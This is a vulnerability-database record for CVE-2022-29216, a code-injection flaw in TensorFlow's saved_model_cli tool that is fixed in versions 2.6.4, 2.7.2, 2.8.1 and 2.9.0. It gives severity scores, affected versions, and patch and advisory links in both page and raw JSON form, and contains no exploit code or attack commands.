cvelistv5 - cve-2022-29216

CVE-2022-29216 (GCVE-0-2022-29216)

Vulnerability from cvelistv5

Published

2022-05-20 23:35

Modified

2025-04-22 17:56

Severity ?

7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-94 - Improper Control of Generation of Code ('Code Injection')

Summary

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow's `saved_model_cli` tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this is still not severe. The maintainers have now removed the `safe=False` argument, so all parsing is done without calling `eval`. The patch is available in versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4.

References

►

URL

Tags

security-advisories@github.com	https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574	Third Party Advisory
security-advisories@github.com	https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7	Patch, Third Party Advisory
security-advisories@github.com	https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac	Patch, Third Party Advisory
security-advisories@github.com	https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4	Release Notes, Third Party Advisory
security-advisories@github.com	https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2	Release Notes, Third Party Advisory
security-advisories@github.com	https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1	Release Notes, Third Party Advisory
security-advisories@github.com	https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0	Release Notes, Third Party Advisory
security-advisories@github.com	https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc	Exploit, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7	Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac	Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4	Release Notes, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2	Release Notes, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1	Release Notes, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0	Release Notes, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc	Exploit, Patch, Third Party Advisory

Impacted products

	Vendor	Product	Version
	tensorflow	tensorflow	Version: < 2.6.4 Version: >= 2.7.0rc0, < 2.7.2 Version: >= 2.8.0rc0, < 2.8.1 Version: >= 2.9.0rc0, < 2.9.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T06:17:54.261Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-29216",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-22T15:43:15.365425Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-22T17:56:38.650Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "tensorflow",
          "vendor": "tensorflow",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.6.4"
            },
            {
              "status": "affected",
              "version": "\u003e= 2.7.0rc0, \u003c 2.7.2"
            },
            {
              "status": "affected",
              "version": "\u003e= 2.8.0rc0, \u003c 2.8.1"
            },
            {
              "status": "affected",
              "version": "\u003e= 2.9.0rc0, \u003c 2.9.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow\u0027s `saved_model_cli` tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this is still not severe. The maintainers have now removed the `safe=False` argument, so all parsing is done without calling `eval`. The patch is available in versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-94",
              "description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-05-20T23:35:13.000Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574"
        }
      ],
      "source": {
        "advisory": "GHSA-75c9-jrh4-79mc",
        "discovery": "UNKNOWN"
      },
      "title": "Code injection in `saved_model_cli` in TensorFlow",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2022-29216",
          "STATE": "PUBLIC",
          "TITLE": "Code injection in `saved_model_cli` in TensorFlow"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "tensorflow",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "\u003c 2.6.4"
                          },
                          {
                            "version_value": "\u003e= 2.7.0rc0, \u003c 2.7.2"
                          },
                          {
                            "version_value": "\u003e= 2.8.0rc0, \u003c 2.8.1"
                          },
                          {
                            "version_value": "\u003e= 2.9.0rc0, \u003c 2.9.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "tensorflow"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow\u0027s `saved_model_cli` tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this is still not severe. The maintainers have now removed the `safe=False` argument, so all parsing is done without calling `eval`. The patch is available in versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7",
              "refsource": "MISC",
              "url": "https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7"
            },
            {
              "name": "https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4",
              "refsource": "MISC",
              "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4"
            },
            {
              "name": "https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2",
              "refsource": "MISC",
              "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2"
            },
            {
              "name": "https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1",
              "refsource": "MISC",
              "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1"
            },
            {
              "name": "https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0",
              "refsource": "MISC",
              "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0"
            },
            {
              "name": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc",
              "refsource": "CONFIRM",
              "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc"
            },
            {
              "name": "https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac",
              "refsource": "MISC",
              "url": "https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac"
            },
            {
              "name": "https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574",
              "refsource": "MISC",
              "url": "https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574"
            }
          ]
        },
        "source": {
          "advisory": "GHSA-75c9-jrh4-79mc",
          "discovery": "UNKNOWN"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2022-29216",
    "datePublished": "2022-05-20T23:35:13.000Z",
    "dateReserved": "2022-04-13T00:00:00.000Z",
    "dateUpdated": "2025-04-22T17:56:38.650Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2022-29216\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2022-05-21T00:15:11.980\",\"lastModified\":\"2024-11-21T06:58:44.327\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow\u0027s `saved_model_cli` tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this is still not severe. The maintainers have now removed the `safe=False` argument, so all parsing is done without calling `eval`. The patch is available in versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4.\"},{\"lang\":\"es\",\"value\":\"TensorFlow es una plataforma de c\u00f3digo abierto para el aprendizaje autom\u00e1tico. En versiones anteriores a 2.9.0, 2.8.1, 2.7.2 y 2.6.4, la herramienta \\\"saved_model_cli\\\" de TensorFlow es vulnerable a una inyecci\u00f3n de c\u00f3digo. Esto puede ser usado para abrir un shell inverso. Esta ruta de c\u00f3digo fue mantenida por razones de compatibilidad, ya que los mantenedores ten\u00edan varios casos de prueba en los que eran usadas expresiones numpy como argumentos. Sin embargo, dado que la herramienta siempre es ejecutada manualmente, el impacto de esto no es grave. Los mantenedores han eliminado el argumento \\\"safe=False\\\", por lo que todo el an\u00e1lisis sea realizado sin llamar a \\\"eval\\\". El parche est\u00e1 disponible en las versiones 2.9.0, 2.8.1, 2.7.2 y 2.6.4\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:L/AC:L/Au:N/C:P/I:P/A:P\",\"baseScore\":4.6,\"accessVector\":\"LOCAL\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":3.9,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.6.4\",\"matchCriteriaId\":\"D9359D32-D090-44CF-AC43-2046084A28BB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.7.0\",\"versionEndExcluding\":\"2.7.2\",\"matchCriteriaId\":\"C4DFBF2D-5283-42F6-8800-D653BFA5CE82\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:google:tensorflow:2.7.0:rc0:*:*:*:*:*:*\",\"matchCriteriaId\":\"A58EDA5C-66D6-46F1-962E-60AFB7C784A7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:google:tensorflow:2.7.0:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"89522760-C2DF-400D-9624-626D8F160CBA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:google:tensorflow:2.8.0:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"E9EA1898-ACAA-4699-8BAE-54D62C1819FB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:google:tensorflow:2.8.0:rc0:*:*:*:*:*:*\",\"matchCriteriaId\":\"130DE3C9-6842-456F-A259-BF8FF8457217\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:google:tensorflow:2.8.0:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"BBF2FCEF-989C-409D-9F4C-81418C65B972\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:google:tensorflow:2.9.0:rc0:*:*:*:*:*:*\",\"matchCriteriaId\":\"9CFB1CFC-579D-4647-A472-6DE8BE1951DE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:google:tensorflow:2.9.0:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"F3F3F37E-D27F-4060-830C-0AFF16150777\"}]}]}],\"references\":[{\"url\":\"https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Patch\",\"Third Party Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-03T06:17:54.261Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2022-29216\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-04-22T15:43:15.365425Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-04-22T15:43:17.062Z\"}}], \"cna\": {\"title\": \"Code injection in `saved_model_cli` in TensorFlow\", \"source\": {\"advisory\": \"GHSA-75c9-jrh4-79mc\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.8, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"tensorflow\", \"product\": \"tensorflow\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.6.4\"}, {\"status\": \"affected\", \"version\": \"\u003e= 2.7.0rc0, \u003c 2.7.2\"}, {\"status\": \"affected\", \"version\": \"\u003e= 2.8.0rc0, \u003c 2.8.1\"}, {\"status\": \"affected\", \"version\": \"\u003e= 2.9.0rc0, \u003c 2.9.0\"}]}], \"references\": [{\"url\": \"https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow\u0027s `saved_model_cli` tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this is still not severe. The maintainers have now removed the `safe=False` argument, so all parsing is done without calling `eval`. The patch is available in versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-94\", \"description\": \"CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2022-05-20T23:35:13.000Z\"}, \"x_legacyV4Record\": {\"impact\": {\"cvss\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.8, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}, \"source\": {\"advisory\": \"GHSA-75c9-jrh4-79mc\", \"discovery\": \"UNKNOWN\"}, \"affects\": {\"vendor\": {\"vendor_data\": [{\"product\": {\"product_data\": [{\"version\": {\"version_data\": [{\"version_value\": \"\u003c 2.6.4\"}, {\"version_value\": \"\u003e= 2.7.0rc0, \u003c 2.7.2\"}, {\"version_value\": \"\u003e= 2.8.0rc0, \u003c 2.8.1\"}, {\"version_value\": \"\u003e= 2.9.0rc0, \u003c 2.9.0\"}]}, \"product_name\": \"tensorflow\"}]}, \"vendor_name\": \"tensorflow\"}]}}, \"data_type\": \"CVE\", \"references\": {\"reference_data\": [{\"url\": \"https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7\", \"name\": \"https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7\", \"refsource\": \"MISC\"}, {\"url\": \"https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4\", \"name\": \"https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4\", \"refsource\": \"MISC\"}, {\"url\": 